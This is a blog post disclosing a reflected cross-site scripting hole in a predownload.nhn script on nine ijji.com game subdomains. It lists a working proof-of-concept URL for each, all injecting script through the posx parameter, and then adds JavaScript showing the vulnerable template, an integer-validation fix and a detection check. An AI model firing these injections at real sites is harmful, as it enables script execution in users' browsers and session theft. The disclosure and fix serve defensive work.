Type: Non-persistent
Criteria: None
The penultimate post in this experimental blog, disclosing 9 separate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.
1) Top-level
http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
2) www2
http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
3) Huxley:The Dystopia
http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
4) Soldier Front
http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
5) GunZ
http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
6) Drift City
http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
7) Lunia
http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
8) Game
http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
9) Events
http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
This script has an advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.
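The shape of the payload above (close a statement and a brace, run code, reopen `function init(){return`) suggests that `posx` is written unescaped into an inline script inside a function named `init`. The following is an added example, not code from ijji or from the original post: it reproduces that assumed template beside a hardened form that only lets a validated integer reach the script. All function names and the `example.test` host are hypothetical.

```javascript
// Added example. Assumption: the page emits posx inside init() in an inline
// script; the real template is not shown in the post.

// posx value from the URLs above after URL decoding (%20 becomes a space).
const PAYLOAD = "0;}alert(/xss/.source);function init(){return";

// Vulnerable pattern: the raw query value is concatenated into script source.
function renderUnsafe(posx) {
  return "<script>function init(){var posx=" + posx + ";}</script>";
}

// Allow-list check: optional minus sign and 1 to 5 digits, nothing else.
function isIntegerParam(raw) {
  return typeof raw === "string" && /^-?\d{1,5}$/.test(raw);
}

// Returns a Number; anything that is not a plain integer becomes the fallback.
function parsePosx(raw, fallback = 0) {
  return isIntegerParam(raw) ? Number(raw) : fallback;
}

// Hardened pattern: only the validated number is written into the script.
function renderSafe(posx) {
  return "<script>function init(){var posx=" + parsePosx(posx) + ";}</script>";
}

// Log or WAF-style check: flag a request whose posx is present but not an
// integer. URLSearchParams splits on "&" only, so ";" stays inside the value.
function isSuspiciousRequest(url) {
  const raw = new URL(url).searchParams.get("posx");
  return raw !== null && !isIntegerParam(raw);
}

// Constructed sample requests (example.test is a placeholder host).
const SAMPLE_BAD =
  "http://example.test/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return";
const SAMPLE_GOOD = "http://example.test/common/predownload.nhn?posx=120";
```

In the unsafe output the injected `}` ends `init` early and the trailing `function init(){return` absorbs the template's own `;}`, so the script still parses; in the safe output the same input collapses to `posx=0`.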